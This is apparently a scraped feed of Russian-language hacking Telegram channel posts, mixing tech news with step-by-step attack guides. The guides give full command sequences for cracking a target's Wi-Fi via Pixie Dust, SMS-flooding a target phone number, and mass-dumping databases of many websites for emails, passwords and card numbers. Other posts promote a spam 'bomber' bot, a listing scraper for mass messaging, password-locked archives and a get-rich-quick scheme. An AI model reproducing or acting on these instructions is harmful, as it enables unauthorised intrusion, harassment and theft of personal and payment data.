Взламываем точку доступа смартфона

Мобильный WiFi-роутер. У меня нет претензий к тому, как это работает, но то, как он устроен, вызывает несколько вопросов. Создается впечатление, что на нем работает какое-то программное обеспечение (точнее, веб-сервер, который предоставляет интерфейс для выполнения настроек устройства). Эта гипотеза заставила меня задать следующие вопросы: Работает ли на устройстве Linux? Если Linux на роутере работает, то можно ли получить на нём root-права?
Короче говоря, погнали со всем этим разбираться. Сейчас будем взламывать всё это дело.

Читать

🔑 Делаем с нуля 1500-3000 рублей в день, полностью без вложенийм

​​WinHook – легальный шпионаж

Порой логика инженеров Microsoft не выдерживает никакой критики. В священных войнах с хакерами они сами вручают им мандат на использование уязвимых функций, после чего отлавливают их-же с претензиями на взлом. Из большого числа подобных API на передний план буйком выплывает SetWindowsHookEx(), при помощи которой одним кликом мыши можно внедрить "творческую" свою DLL сразу во все активные процессы системы. В итоге, даже обычный юзверь может перехватить любые действия пользователя, вплоть до логирования клавиатурного ввода. И что особенно важно, ничего криминального в этом нет, поскольку мелкософт сама предлагает нам эту функцию, оформив ей прописку в библиотеке user32.dll. Чем они руководствовались остаётся для нас загадкой, но функция есть, а значит имеет смысл рассмотреть подробно её реализацию.

Читать: https://codeby.net/threads/winhook-legalnyj-shpionazh.76505/

#winhook #asm #dll

​Instagram будет блокировать аккаунты за оскорбления

В администрации социальной сети Instagram сообщили, что впредь аккаунты, которые рассылают враждебные высказывания в личных сообщениях, будут блокироваться. Ранее мерой профилактики в вопросе оскорблений и дискриминации в Instagram был временный запрет на ведение личной переписки.

"Теперь, если кто-то продолжит отправлять сообщения с нарушениями, мы отключим его учетную запись, которая создана исключительно для отправки оскорбительных сообщений", – сообщили в компании.

В компании также уточнили, удалять аккаунт будут не только за оскорбления, но и сообщения, разжигающие религиозную, расовую ненависть или нарушающие иные нормы общественной морали.

​Взламываем Wi-Fi в два касания

Сегодня мы разберемся, как взломать целевую точку доступа Wi-Fi, используя уязвимость Pixie Dust.

Для начала обновляем пакеты Kali Linux:
apt update && apt upgrade

Клонируем инструмент с репозитория GitHub:
git clone https://github.com/drygdryg/OneShot

Далее переходим в директорию:
cd OneShot

И запускаем инструмент:
python oneshot.py -i <сетевой интерфейс> -K

Перед нами появится список точек доступа Wi-Fi, среди которых выбираем целевую точку доступа. Инструмент произведет атаку Pixie Dust, в результате которой будет показан WPS PIN.

Теперь вводим команду, с помощью которой мы получим пароль от точки доступа: python oneshot.py -i <сетевой интерфейс> -b <BSSID> -p <WPS PIN>

@ShadowCasher

​Многочисленный флуд на номер телефона

Сегодня мы разберемся, как реализовать многопоточный флуд на целевой номер телефона, используя утилиту Impulse.

Для начала обновляем пакеты Kali Linux:
apt update && apt upgrade

Устанавливаем все необходимые библиотеки:
apt install python3 python3-pip git -y

Клонируем инструмент с репозитория GitHub:
git clone https://github.com/LimerBoy/Impulse

Далее переходим в директорию:
cd Impulse

Устанавливаем зависимости:
pip3 install -r requirements.txt

И запускаем атаку:
python3 impulse.py --method SMS --time 20 --threads 15
--target <номер телефона>

Конечно, для вышеперечисленной команды можно указать свои параметры, информацию о которых можно посмотреть с помощью команды: python3 impulse.py --help

@ShadowCasher

​​EpicEpic Games привлекла антимонопольные органы в борьбе с Apple

Компания Epic Games обратилась к антимонопольным регуляторам Европейского союза с жалобой на Apple, заявив, что техногигант нечестно использует свою экосистему iOS для взымания налога в размере 30% на покупки в App Store.

Судебный спор между двумя компаниями ведется с августа 2020 года, когда разработчик игр внедрил в Fortnite свою платежную систему, позволявшую обойти комиссию магазина App Store в 30%. Это позволило игрокам приобретать внутриигровую валюту Fortnite дешевле.

Подобные действия побудили Apple исключить игру Fortnite из магазина App Store, а также удалить учетную запись разработчиков Epic Games в магазине. Генеральный директор Epic Тим Суини заявил, что методы Apple вредны как для потребителей, так и для разработчиков.

@ShadowCasher

​​Массовый взлом баз данных с помощью доработанного sqlmap

Утилита WrapSqlmap является доработанной версией sqlmap. В её функционал добавлена возможность сканирования и автоматического слива баз данных сразу нескольких целей, которые вносятся в один файл.

Установка

$ git clone https://github.com/THSamurai/WrapSQLMAP
$ cd WrapSQLMAP
$ nano wrapper_config.py

• В поле URLS_FILE пишем путь к файлу с ссылками на атакуемые сайты.
• Параметр DUMP установите в True.

Использование

Теперь остается только запустить программу указав, какие колонки из взломанных БД нужно сливать 👇
$ python wrapper.py email, pass, card

Хорошего дня ✌️

secserv — сервис для создания зашифрованных записок

Можно выбрать между AES256 и Vernam шифрованием, задать срок жизни записки, использовать ложное сообщение, поставить автоудаление после прочтения и прикреплять файлы.

#скрипт #python

Скрипт бота Karas Bomber

Простейший скрипт для поднятия собственного telegram-бота с последующей монетизацией.

Скриншот
Пароль на архив: @mamontyatina

#софт

OLX UA Parser

Парсер объявлений с украинского OLX. В основном используется для дальнейшей рассылки сообщений в мессенджерах.

Мануал
VirusTotal
Пароль на инсталлер: SUK999
Пароль на архив: @mamontyatina

Какое направление в кибербезопасности выбрать: Red Team или Blue Team?

24 февраля пройдет вебинар «Pentester vs. IT-Security Expert» от HackerU, на которым вы узнаете особенности каждого из направлений кибербезопасности, что необходимо для работы в каждом из них, а также разницу в знаниях двух экспертов в вопросах технологий и подходов в обеспечении ИБ и их ежедневные задачи.

Кому он будет полезен? Для желающих развиваться в кибербезопасности и IT-специалистов любого уровня.

Кто спикеры? Два руководителя Red Team и Blue Team команд, которые расскажут о ключевых технологиях в ИБ и пентесте, а также реальные истории из практики, свои ошибки и победы

Во сколько начинаем? 24 февраля в 19:00. Вебинар продлится 1,5 часа.

Сколько стоит? Бесплатно.

Примите участие в вебинаре и получите полезные лайфхаки для успешного развития в двух востребованных направлениях ИБ! Регистрируйтесь по ссылке: https://is.gd/hmqLhc

Как установить Kali Nethunter в Termux.

•Вначале устанавливаем wget:

pkg install wget

•Далее качаем скрипт

wget https://raw.githubusercontent.com/Hax4us/Nethunter-In-Termux/master/kalinethunter

•Далее даём права на выполнение скрипту

chmod +x kalinethunter

•Запускаем

./kalinethunter

•Начнется установка все установится само НО у вам будут спрашивать во время установки "надо или нет" везде просто нажать Enter или можете почитать и выбрать на свой вкус)))
•Далее пишем

startkali

Приятного пользования!